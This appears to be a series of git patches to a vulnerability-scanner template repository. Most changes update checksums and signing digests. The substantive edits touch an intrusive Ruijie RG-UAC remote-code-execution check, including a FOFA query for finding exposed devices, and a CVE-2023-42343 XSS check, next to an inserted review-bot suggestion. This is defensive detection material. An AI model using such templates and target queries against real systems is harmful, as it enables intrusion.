@@ -2884,6 +2884,7 @@ http/cves/2023/CVE-2023-45852.yaml:7a4038ad99644855dfe6f39ac7e92fd73a3d60d2 http/cves/2023/CVE-2023-4596.yaml:bde7e510ccbbc29b43e191885a24e24f57f61e10 http/cves/2023/CVE-2023-4634.yaml:daab5c713c8bd42dfa868fa9532bdd100717a39a http/cves/2023/CVE-2023-46359.yaml:d59f73a4697ea1c18976e3856588c47a78c31d7b +http/cves/2023/CVE-2023-46574.yaml:a648ce65c19263d9e44d8dfc49f1b2ae02fc19f9 http/cves/2023/CVE-2023-46747.yaml:6b2841039a71d5b669379deccc0c4a486a2d0375 http/cves/2023/CVE-2023-4714.yaml:dc45b7ef7c33406421a4adeceb368adf378546a8 http/cves/2023/CVE-2023-47246.yaml:5a472de48a5400547843cc0f0a2a647a7e96c801 @@ -4231,7 +4232,7 @@ http/exposures/configs/wpconfig-aws-keys.yaml:b7a010abea8ee72e3c7ffb7602f2fd10b7 http/exposures/configs/xprober-service.yaml:3480056d644ec37a3b9ce5e81f55b9b279d66880 http/exposures/configs/yii-debugger.yaml:ea6beec4c6f22d31b0402f8ad1590aa8d87166de http/exposures/configs/zend-config-file.yaml:dd51767a5f5fbbc68e0d0f2f82ecaf7eb390a47b -http/exposures/docker-daemon-exposed.yaml:1a906cb866350a3f2615324f8a11328aab8671e0 +http/exposures/docker-daemon-exposed.yaml:7058b14b309a1b24bf20748bc1d7672987f061de http/exposures/files/angular-json.yaml:33a8441b1e158d34f7f877820ba705662f9ba017 http/exposures/files/apache-licenserc.yaml:e7bf77390ddc3ece376cee856d2f8beb4820ef9b http/exposures/files/apdisk-disclosure.yaml:d911bc900df9ebb34b5068a66376c86aee4a1b90 
@@ -7712,7 +7713,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:0c2a4ee0f79c4db800e40b84866a0f956830ce4a +templates-checksum.txt:2617bfc433a5f43d67f7b8f1a4b2c3f3985bfa88 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 89ed09faaaca57d99563ff31dff8007dfd945703 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 09:28:02 +0000 Subject: [PATCH 55/64] Auto Template Signing [Wed Dec 27 09:28:02 UTC 2023] :robot: --- http/cves/2023/CVE-2023-46574.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-46574.yaml b/http/cves/2023/CVE-2023-46574.yaml index 344f615518..7088380485 100644 --- a/http/cves/2023/CVE-2023-46574.yaml +++ b/http/cves/2023/CVE-2023-46574.yaml @@ -56,3 +56,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100f3b495dfdf9013fd352455e557179b61f26ea1a8b0681f19e7c5765f069fd411022100f74770687188358ff96bcf2b881c7ae1428a59ac92db8ee9398813263bef7b7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 873e2e6720882be8f30573869fd19618d430008d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 27 Dec 2023 15:14:27 +0530 Subject: [PATCH 56/64] Update ruijie-rg-uac-nmc-sync-rce.yaml --- http/vulnerabilities/ruijie/ruijie-rg-uac-nmc-sync-rce.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/vulnerabilities/ruijie/ruijie-rg-uac-nmc-sync-rce.yaml b/http/vulnerabilities/ruijie/ruijie-rg-uac-nmc-sync-rce.yaml index e7ff7a3dba..30bb423166 100644 
--- a/http/vulnerabilities/ruijie/ruijie-rg-uac-nmc-sync-rce.yaml
+++ b/http/vulnerabilities/ruijie/ruijie-rg-uac-nmc-sync-rce.yaml
@@ -1,4 +1,4 @@
-id: ruijie-rg-uac-nmc-sync-rce
+id: ruijie-nmc-sync-rce

 info:
 name: Ruijie RG-UAC nmc_sync.php - Remote Code Execution
@@ -9,9 +9,9 @@ info:
 reference:
 - https://github.com/xinyisleep/pocscan/blob/main/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7_EG%E6%98%93%E7%BD%91%E5%85%B3_%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F_%E5%89%8D%E5%8F%B0RCE.py
 metadata:
+ max-request: 3
 verified: true
- max-request: 1
- fofa-query: title="RG-UAC登录页面" && body="admin" || app="Ruijie-RG-UAC" || title="rg-uac"
+ fofa-query: title="RG-UAC登录页面" && body="admin"
 tags: rg-uac,file-upload,intrusive,ruijie

 variables:
From 9f97180770cc56a23e2ca7e7a97c8fd3a1a81088 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 27 Dec 2023 15:14:43 +0530 Subject: [PATCH 57/64] Rename ruijie-rg-uac-nmc-sync-rce.yaml to ruijie-nmc-sync-rce.yaml
---
 .../{ruijie-rg-uac-nmc-sync-rce.yaml => ruijie-nmc-sync-rce.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/vulnerabilities/ruijie/{ruijie-rg-uac-nmc-sync-rce.yaml => ruijie-nmc-sync-rce.yaml} (100%)
diff --git a/http/vulnerabilities/ruijie/ruijie-rg-uac-nmc-sync-rce.yaml b/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml similarity index 100% rename from http/vulnerabilities/ruijie/ruijie-rg-uac-nmc-sync-rce.yaml rename to http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml
From 275504566344302170e584404b7e061d3c79ca4d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 09:47:31 +0000 Subject: [PATCH 58/64] Auto Generated New Template Addition List [Wed Dec 27 09:47:31 UTC 2023] :robot:
---
 .new-additions | 1 + 1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index eb285316c1..4e523ae7aa 100644
--- a/.new-additions
+++ b/.new-additions
@@ -2,5 +2,6 @@ http/cves/2015/CVE-2015-2794.yaml http/cves/2023/CVE-2023-46574.yaml http/exposures/docker-daemon-exposed.yaml http/token-spray/api-openai.yaml +http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml From 5a6c2873c9831598a5e8caec46a6e418c80fec20 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 09:47:32 +0000 Subject: [PATCH 59/64] Auto Generated Templates Checksum [Wed Dec 27 09:47:32 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ddca8868f3..5dbef88888 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2884,7 +2884,7 @@ http/cves/2023/CVE-2023-45852.yaml:7a4038ad99644855dfe6f39ac7e92fd73a3d60d2 http/cves/2023/CVE-2023-4596.yaml:bde7e510ccbbc29b43e191885a24e24f57f61e10 http/cves/2023/CVE-2023-4634.yaml:daab5c713c8bd42dfa868fa9532bdd100717a39a http/cves/2023/CVE-2023-46359.yaml:d59f73a4697ea1c18976e3856588c47a78c31d7b -http/cves/2023/CVE-2023-46574.yaml:a648ce65c19263d9e44d8dfc49f1b2ae02fc19f9 +http/cves/2023/CVE-2023-46574.yaml:6ace2075b83e46ad50e0948d07307e229fc5762a http/cves/2023/CVE-2023-46747.yaml:6b2841039a71d5b669379deccc0c4a486a2d0375 http/cves/2023/CVE-2023-4714.yaml:dc45b7ef7c33406421a4adeceb368adf378546a8 http/cves/2023/CVE-2023-47246.yaml:5a472de48a5400547843cc0f0a2a647a7e96c801 
@@ -7211,6 +7211,7 @@ http/vulnerabilities/ruijie/ruijie-eg-rce.yaml:30d9d3087f11408821e363103be528190 http/vulnerabilities/ruijie/ruijie-excu-shell.yaml:4e44d86d3461ede6a3e205a00a96c455937c7640 http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml:d21221f94ba84906b86aebb2ef888e8df203035f http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml:c3789288ed1f6805695c9ccc837a1b056f017975 +http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml:5341e74f3176bce85489ab0cd18244392644fdde http/vulnerabilities/ruijie/ruijie-password-leak.yaml:b40b0764c02ffb6af9faef8f9153a8995c0f0522 http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml:53008f0d81816731ea6a5a41c1d7bb8712c71f41 http/vulnerabilities/ruijie-eg-login-rce.yaml:95135a8fbb28e97e78f39b9c640f6dca3a49c283 @@ -7713,7 +7714,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:2617bfc433a5f43d67f7b8f1a4b2c3f3985bfa88 +templates-checksum.txt:4e41b5bebeca5793322d8d537788639de375fb96 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 460607df50e2c0ffa0869ed41186b6a54f101b34 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 09:49:14 +0000 Subject: [PATCH 60/64] Auto Template Signing [Wed Dec 27 09:49:14 UTC 2023] :robot: --- http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml b/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml index 30bb423166..fe7fbefc07 100644 --- a/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml +++ b/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml 
@@ -38,3 +38,4 @@ http: - "status_code_1 == 200 && status_code_2 == 200" - "contains(body_2, '{{match_str}}')" condition: and +# digest: 490a004630440220107e82c256ac53f33688042cb40b0ab8357fe4c6a177cda03aa8d28bb425cab402206cc9b6dee983d7b147da5987a1cc826b661b926f421509e9dbdaccae2861a971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file
From 5f5568fa277254964111fca3850ce2654ccee151 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 27 Dec 2023 15:40:57 +0530 Subject: [PATCH 61/64] Update CVE-2023-42343.yaml
---
 http/cves/2023/CVE-2023-42343.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/http/cves/2023/CVE-2023-42343.yaml b/http/cves/2023/CVE-2023-42343.yaml
index cbd72cf1c8..50f758eff1 100644
--- a/http/cves/2023/CVE-2023-42343.yaml
+++ b/http/cves/2023/CVE-2023-42343.yaml
@@ -24,9 +24,11 @@ http:
 headers:
 Content-Type: application/cmisquery+xml

+ matchers-condition: and
 matchers:
 - type: word
+ part: body
 words:
 - 'Apache Chemistry OpenCMIS'
 - ''
- part: body
+ condition: and
From f73f067273eeb560763181cdf7997ccd2f6e3fd2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 28 Dec 2023 02:00:48 +0000 Subject: [PATCH 62/64] Auto Generated New Template Addition List [Thu Dec 28 02:00:48 UTC 2023] :robot:
---
 .new-additions | 1 + 1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 4e523ae7aa..315969c1d4 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,4 +1,5 @@ http/cves/2015/CVE-2015-2794.yaml +http/cves/2023/CVE-2023-42343.yaml http/cves/2023/CVE-2023-46574.yaml http/exposures/docker-daemon-exposed.yaml http/token-spray/api-openai.yaml
From 99514cbdd5b336db9ec5bea90a2cae2ecc38f81a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 28 Dec 2023 02:01:08 +0000 Subject: [PATCH 63/64] Auto Generated Templates Checksum [Thu Dec 28 02:01:08 UTC 2023] :robot:
---
 templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-)
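Review bot: `matchers-condition: and`, added on the first changed line of the CVE-2023-42343 hunk, governs a single matcher and so changes nothing by itself; what the template still lacks is a check that the response is HTML with a 200 status, without which a reflection into the CMIS Atom/XML feed is reported as exploitable XSS. The `condition: and` added on the last line also narrows nothing while the second `words` entry is, as rendered here, the empty string `''`, which every body satisfies — that entry needs the exact reflected payload. With a header and a status matcher alongside the word matcher the `matchers-condition` becomes meaningful:

```yaml
    matchers-condition: and
    matchers:
      # … unchanged: body word matcher for 'Apache Chemistry OpenCMIS' and the reflected payload …

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```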
diff --git a/templates-checksum.txt b/templates-checksum.txt index 5dbef88888..4b3f31d4cc 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2868,6 +2868,7 @@ http/cves/2023/CVE-2023-4173.yaml:dd8fc306806e02e32b2b65c1724af7d2e98a0750 http/cves/2023/CVE-2023-4174.yaml:198a66f32f2380336f28a80f9d01a011be85d734 http/cves/2023/CVE-2023-41763.yaml:5309f08e84061f05237d084a16c52c437e6c0a77 http/cves/2023/CVE-2023-41892.yaml:c3c96a50f998019eb2f4758715690854c33eb55a +http/cves/2023/CVE-2023-42343.yaml:fb446106f82992be050cf1eac67f524e579950a6 http/cves/2023/CVE-2023-42442.yaml:9a20ac3bf72a03abc2e2e5bd5e5b71a78d9cac6c http/cves/2023/CVE-2023-42793.yaml:996b31479d926952afef3be9af399801d7034027 http/cves/2023/CVE-2023-43177.yaml:56bd157549c16eb05221a59aab962165b4bf992c @@ -7211,7 +7212,7 @@ http/vulnerabilities/ruijie/ruijie-eg-rce.yaml:30d9d3087f11408821e363103be528190 http/vulnerabilities/ruijie/ruijie-excu-shell.yaml:4e44d86d3461ede6a3e205a00a96c455937c7640 http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml:d21221f94ba84906b86aebb2ef888e8df203035f http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml:c3789288ed1f6805695c9ccc837a1b056f017975 -http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml:5341e74f3176bce85489ab0cd18244392644fdde +http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml:85cd22dc109529bd4a93f0d18672d93221befc04 http/vulnerabilities/ruijie/ruijie-password-leak.yaml:b40b0764c02ffb6af9faef8f9153a8995c0f0522 http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml:53008f0d81816731ea6a5a41c1d7bb8712c71f41 http/vulnerabilities/ruijie-eg-login-rce.yaml:95135a8fbb28e97e78f39b9c640f6dca3a49c283 
@@ -7714,7 +7715,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:4e41b5bebeca5793322d8d537788639de375fb96 +templates-checksum.txt:64044c74227162222065c4d5b7a5a7a010925ec7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b89ff611fe3cf00a66cdb659d5b51544b7871a0f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 28 Dec 2023 02:02:44 +0000 Subject: [PATCH 64/64] Auto Template Signing [Thu Dec 28 02:02:44 UTC 2023] :robot: --- http/cves/2023/CVE-2023-42343.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-42343.yaml b/http/cves/2023/CVE-2023-42343.yaml index 50f758eff1..0dcff613b6 100644 --- a/http/cves/2023/CVE-2023-42343.yaml +++ b/http/cves/2023/CVE-2023-42343.yaml @@ -32,3 +32,4 @@ http: - 'Apache Chemistry OpenCMIS' - '' condition: and +# digest: 4a0a00473045022059541a77f42a99970a9f0b5cc68fd577751fffab1e2c2350f636f6e445739f35022100afe449fd219a2ed7b76c45634f3eef7856e4b86c12459e9e002bb08364a2d9cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file